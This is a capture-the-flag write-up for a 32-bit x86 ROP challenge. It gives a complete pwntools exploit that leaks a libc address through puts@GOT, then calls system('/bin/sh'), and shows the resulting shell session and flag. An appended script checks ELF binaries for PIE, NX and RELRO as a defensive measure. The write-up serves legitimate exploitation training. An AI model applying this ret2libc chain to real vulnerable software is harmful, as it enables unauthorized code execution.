Description
X86 ROP
nc prob2.cstec.kr 5340
A 32-bit ROP challenge. The binary has a buffer-overflow vulnerability, and PIE is disabled.
#!/usr/bin/python3
from pwn import *

p = remote("prob2.cstec.kr", 5340)
e = ELF("./x86_rop")
l = ELF("./libc.so.6")

p.sendlineafter(b"Enter choice : ", b"1")

pr = 0x080491e5  # pop ; ret gadget: discards one stack argument before returning

# Stage 1: 28 bytes of padding reach the saved return address, then ret2plt.
# puts(puts@GOT) prints the resolved libc address of puts; the pop;ret gadget
# removes the argument and returns into main so the overflow can be triggered again.
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(e.plt["puts"])
buf += p32(pr)
buf += p32(e.got["puts"])
buf += p32(e.sym["main"])
p.send(buf)

leak = u32(p.recv(4))
leak -= l.sym["puts"]  # libc base = leaked puts address - offset of puts inside libc
print(hex(leak))

system = leak + l.sym["system"]
binsh = leak + next(l.search(b"/bin/sh"))

# Stage 2: same overflow, now calling system("/bin/sh") with the computed libc base.
p.sendlineafter(b"Enter choice : ", b"1")
buf = b""
buf += b'A' * 24
buf += b'B' * 4
buf += p32(system)
buf += p32(pr)
buf += p32(binsh)
p.send(buf)
p.interactive()
root@learner:/home/learner/Downloads/for_user# ./exploit.py
[+] Opening connection to prob2.cstec.kr on port 5340: Done
[*] '/home/learner/Downloads/for_user/x86_rop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0xf7c9c000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{a23c922d5d1c1b7c390241537c5e5021947d94151c4da48986482c4efbe74062ec2ac1f8d0130fa0dacdaf69ccd8c110801c420a86f781391661f0c2cd0b5f8a00}
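The checksec lines in the session above (No PIE, NX enabled, Partial RELRO) are what made the two-stage ret2plt possible: a fixed image base means puts@plt, puts@GOT and main can be hard-coded. The following added example (not part of the original write-up or the challenge files) shows how those three properties are derived from the ELF header and program headers alone, so a build pipeline can flag an unhardened 32-bit binary before it ships. The sample images are constructed in memory and mirror the challenge's profile; they are not the real x86_rop binary.

```python
#!/usr/bin/env python3
"""Header-level hardening check for ELF32 images: PIE, NX and RELRO.
Added example, not the challenge's code; the sample images are constructed,
header-only ELF32 blobs rather than the real x86_rop binary."""
import struct

ET_EXEC, ET_DYN = 2, 3                                # e_type values
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552   # GNU program-header types
PF_X = 1                                              # executable segment flag


def elf32_mitigations(data: bytes) -> dict:
    """Return {'pie', 'nx', 'relro'} read from the ELF header and program headers."""
    if data[:4] != b"\x7fELF" or data[4] != 1:        # EI_CLASS 1 == ELFCLASS32
        raise ValueError("not an ELF32 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<I", data, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    nx = False      # no PT_GNU_STACK entry at all means the loader maps an executable stack
    relro = "None"
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type = struct.unpack_from("<I", data, off)[0]
        p_flags = struct.unpack_from("<I", data, off + 24)[0]  # p_flags is at +24 in Elf32_Phdr
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = "Partial"   # Full RELRO would also need DT_BIND_NOW; not checked here
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_sample(e_type: int, phdrs: list) -> bytes:
    """Construct a header-only ELF32 image (constructed test data; not loadable)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0x8049000,
                               52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 4) for t, f in phdrs)
    return ehdr + body


# Constructed image with the challenge binary's profile: ET_EXEC (no PIE),
# RW stack (NX on) and a PT_GNU_RELRO segment (Partial RELRO).
CHALLENGE_LIKE = build_sample(ET_EXEC, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])
# Constructed hardened counterpart: ET_DYN, so ASLR randomises the image base.
HARDENED = build_sample(ET_DYN, [(PT_GNU_STACK, 6), (PT_GNU_RELRO, 4)])

if __name__ == "__main__":
    for name, img in (("challenge-like", CHALLENGE_LIKE), ("hardened", HARDENED)):
        print(f"{name:15s} {elf32_mitigations(img)}")
```

Stack-canary detection needs the symbol table (a reference to `__stack_chk_fail`), which this header-only check deliberately leaves out.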